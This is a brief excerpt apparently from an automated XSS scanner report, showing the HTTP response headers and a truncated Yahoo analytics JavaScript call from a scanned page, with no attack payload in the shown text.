Content-Type: text/html;charset=UTF-8
Server: Apache
SVRNAME: wxii2x02
X-Varnish: 2184480864
Vary: Accept-Encoding
Content-Length: 285


YAHOO.metrics.createMetrics({level1:"HOMEPAGE",
level2:"COMMON",
level3:"",
level4:"",
level5:"",
level6:"",
contentType:"",
detail:"",
title:"",
pagename:"/index.html",
ad_category:
...[SNIP]...

Report generated by XSS.CX at Thu Mar 24 12:46:13 CDT 2011.